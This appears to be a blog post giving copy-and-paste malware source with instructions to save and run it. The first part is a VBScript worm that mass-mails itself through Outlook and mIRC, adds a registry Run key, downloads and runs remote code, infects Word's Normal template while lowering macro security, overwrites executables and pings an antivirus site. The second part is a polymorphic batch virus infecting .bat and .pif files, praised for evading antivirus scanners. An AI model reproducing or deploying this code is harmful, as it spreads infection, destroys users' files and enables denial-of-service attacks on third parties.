copy and paste the following...
'Serial Number : 0.7055475
'
On Error Resume Next
spawn()
sub spawn()
Set s = CreateObject("Scripting.FileSystemObject")
Set f = s.GetFile(wscript.scriptfullname)
f.Copy ("c:\anyname.vbs")
f.Copy ("c:\folder\subfolder\...\anyname.vbs")
f.Copy ("c:\attachment.vbs")
f.Copy ("c:\attachment1.vbs")
end sub
mail()
sub mail()
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
If x > 5 Then oo = d.AddressEntries.Count
Next
c.Subject = "DOOM!"
c.Body = "...U Hav Bin Infected!!!"
c.attachments.Add wscript.scriptfullname, 1, 1
c.attachments.Add "c:\attachment.vbs", 1, 2, ""
c.attachments.Add "c:\attachment1.vbs", 1, 3, ""
c.Send
e = ""
Next
b.Logoff
End If
end sub
reg()
sub reg()
dim j
Set j = CreateObject("WScript.Shell")
j.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*HLM", wscript.scriptfullname
end sub
update()
Sub update()
Dim objInet, a
Dim strDownloadedCode
Set objInet = CreateObject("InetCtls.Inet")
objInet.RequestTimeOut = 30
strDownloadedCode = objInet.OpenURL("http://members.tripod.com/yourusername/thevbsroutineupdate.txt")
set fso = createobject("scripting.filesystemobject")
set f = fso.CreateTextFile("c:\update.vbs")
f.write strDownloadedCode
f.close
Set a = CreateObject("WScript.Shell")
a.run ("c:\update.vbs")
end sub
irc()
sub irc()
set fso = createobject("scripting.filesystemobject")
set scrini = fso.CreateTextFile("c:\program files\mirc\script.ini")
scrini.WriteLine "[script]"
scrini.WriteLine "n0=on 1:JOIN:#:{"
scrini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scrini.WriteLine "n2= /dcc send $nick " & wscript.scriptfullname
scrini.WriteLine "n3=}"
scrini.Close
end sub
word()
sub word()
norm ="Sub document_close()" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"Open ""c:\xploit.txt"" For Output As 2" & vbCrLf & _
"Print #2, ""sub document_open()""" & vbCrLf & _
"Print #2, ""On Error Resume Next""" & vbCrLf & _
"Print #2, ""'by alcopaul""" & vbCrLf & _
"Print #2, ""obj = ActiveDocument.Shapes(1).OLEFormat.ClassType""" & vbCrLf & _
"Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" & vbCrLf & _
"Print #2, "" .ActivateAs ClassType:=obj""" & vbCrLf & _
"Print #2, "" .Activate""" & vbCrLf & _
"Print #2, ""End With""" & vbCrLf & _
"Print #2, ""end sub""" & vbCrLf & _
"Close 2" & vbCrLf & _
"Set fso = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
"Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" & vbCrLf & _
"Set iw = fso.OpenTextFile(""c:\xploit.txt"", 1, True)" & vbCrLf & _
"nt.DeleteLines 1, nt.CountOfLines" & vbCrLf & _
"i = 1 " & vbCrLf & _
"Do While iw.atendofstream <> True" & vbCrLf & _
"b = iw.readline" & vbCrLf & _
"nt.InsertLines i, b " & vbCrLf & _
"i = i + 1 " & vbCrLf & _
"Loop" & vbCrLf & _
"ActiveDocument.Shapes.AddOLEObject _" & vbCrLf & _
"FileName:=""c:\anyname.vbs"", _" & vbCrLf & _
"LinkToFile:=False" & vbCrLf & _
"ActiveDocument.Save" & vbCrLf & _
"Open ""c:\vv.reg"" For Output As 3" & vbCrLf & _
"Print #3, ""REGEDIT4""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, """"""AccessVBOM""""=dword:00000001""" & vbCrLf & _
"Close 3" & vbCrLf & _
"Shell ""regedit /s c:\vv.reg"", vbHide" & vbCrLf & _
"Kill ""c:\vv.reg""" & vbCrLf & _
"End Sub"
Set fso = CreateObject("Scripting.FileSystemObject")
set f = fso.createtextfile("c:\try.txt")
f.write norm
f.Close
Set oword = CreateObject("Word.Application")
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\try.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
oword.NormalTemplate.Save
oword.NormalTemplate.Close
end sub
haha()
Sub haha()
On Error Resume Next
Dim d, dc, s, fso, haha
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
hihi (d.Path & "")
End If
Next
haha = s
End Sub
Sub hehe(folderspec)
On Error Resume Next
Dim f, f1, fc, ext, s, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
s = LCase(f1.Name)
If (ext = "exe") Then
Set f = fso.GetFile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
fso.deletefile(f1.path)
End If
If (s = "freecell.exe") Or (s = "readme.txt") or (s = "license.txt") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path)
fso.deletefile(f1.path)
End If
If (ext = "exe") Or (ext = "bat") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
End If
Next
End Sub
Sub hihi(folderspec)
On Error Resume Next
Dim f, f1, sf, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
hehe (f1.Path)
hihi (f1.Path)
Next
End Sub
dos()
sub dos()
Dim a
Set a = CreateObject("WScript.Shell")
a.run ("c:\windows\ping.exe -t -l 10000 www.grisoft.com")
end sub
msgbox "INFECTED", ,"DOOM"
'=========================================
'made by : Zero Cool
'worm name : INF3CTER
'=========================================
stop copying (do not copy this line!!)
now save the file as infecter.vbs on to your
desktop and/or anywhere else you please.
The next virus I am about to show you is a
polymorphic virus (hard to be picked up by
anti virus scanners)...
Open notepad and copy and paste the folowing...
@set hjmmt=echo
@set bugcl=copy
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
%hjmmt% off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
%hjmmt% off
%hjmmt% Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
:MeLTbeg
%hjmmt% off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
%hjmmt% @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
%hjmmt%.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
%hjmmt% e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
%hjmmt% e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
%hjmmt% e 120 B4 4C CD 21 00>>MeLT.t
%hjmmt% g>>MeLT.t
debug
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
%hjmmt% off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
%hjmmt%.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
%hjmmt%.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=%hjmmt%
cls%_PiFV%
%PiFV%.
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
pause>nul.PiFV
set PiFV=
goto PiFV_end
:PiFV_msg
%hjmmt% [PiFV] by WaveFunc
goto PiFV_end
:PiFV_hst
%PiFVo% %PiFVcl%
goto PiFV_end
:PiFV_go
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
:PiFV_inf
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
%hjmmt% m 124,162 524>PiFV!
%hjmmt% e 100 '@set fn='>>PiFV!
%hjmmt% m 524,562 108>>PiFV!
%hjmmt% n pifv$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 47>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% m 55E,561 108>>PiFV!
%hjmmt% e 10C 0>>PiFV!
%hjmmt% n pifv$$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 10>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% q>>PiFV!
:PiFV_1
debug %PiFVp%
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
%hjmmt% %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
%hjmmt% e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
%hjmmt% e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
%hjmmt% e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
%hjmmt% n pifv$.com>>PiFV$$
%hjmmt% rcx>>PiFV$$
%hjmmt% 2a>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug
%hjmmt% %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
%hjmmt% %hjmmt% off>%PiFVb%
%hjmmt% set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
%hjmmt% e 15E 'PiFV',0>PiFV$$
%hjmmt% e 124 '%PiFVb%',0>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug %PiFVp%
del PiFV$$
:: I think we're done!
exit PiFV
:PiFV_end
%hjmmt% set ff=createobject("scripting.filesystemobject")>>poly.vbs
%hjmmt% set rr=ff.opentextfile(%0,1)>>poly.vbs
%hjmmt% aa = rr.readall>>poly.vbs
%hjmmt% rr.close>>poly.vbs
%hjmmt% Randomize>>poly.vbs
%hjmmt% poly = int(rnd * 3)>>poly.vbs
%hjmmt% if poly = 0 or poly = 2 then>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt","hjmmt" ^& s ^& poly)>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl","bugcl" ^& s ^& s ^& poly)>>poly.vbs
%hjmmt% else>>poly.vbs
%hjmmt% polynum = int(rnd * 7)>>poly.vbs
%hjmmt% for i = 1 to polynum>>poly.vbs
%hjmmt% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% polyall = polyall + polychar>>poly.vbs
%hjmmt% next>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt",polyall )>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl", s ^& polyall)>>poly.vbs
%hjmmt% end if>>poly.vbs
%hjmmt% set bb=ff.opentextfile(%0,2)>>poly.vbs
%hjmmt% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs
@exit
stop copying (do not copy this line!!)
The above virus is extremely difficult for AV
scanners
Posts
No comments:
Post a Comment